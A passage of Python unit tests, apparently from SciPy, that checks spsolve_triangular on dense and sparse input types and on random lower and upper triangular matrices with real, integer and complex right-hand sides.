@sup_sparse_efficiency
def test_input_types(self):
A = array([[1., 0.], [1., 2.]])
b = array([[2., 0.], [2., 2.]])
for matrix_type in (array, csc_matrix, csr_matrix):
x = spsolve_triangular(matrix_type(A), b, lower=True)
assert_array_almost_equal(A.dot(x), b)
@pytest.mark.slow
@sup_sparse_efficiency
def test_random(self):
def random_triangle_matrix(n, lower=True):
A = scipy.sparse.random(n, n, density=0.1, format='coo')
if lower:
A = scipy.sparse.tril(A)
else:
A = scipy.sparse.triu(A)
A = A.tocsr(copy=False)
for i in range(n):
A[i, i] = np.random.rand() + 1
return A
np.random.seed(1234)
for lower in (True, False):
for n in (10, 10**2, 10**3):
A = random_triangle_matrix(n, lower=lower)
for m in (1, 10):
for b in (np.random.rand(n, m),
np.random.randint(-9, 9, (n, m)),
np.random.randint(-9, 9, (n, m)) +
np.random.randint(-9, 9, (n, m)) * 1j):
x = spsolve_triangular(A, b, lower=lower)
assert_array_almost_equal(A.dot(x), b)
x = spsolve_triangular(A, b, lower=lower,
unit_diagonal=True)
A.setdiag(1)
assert_array_almost_equal(A.dot(x), b)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.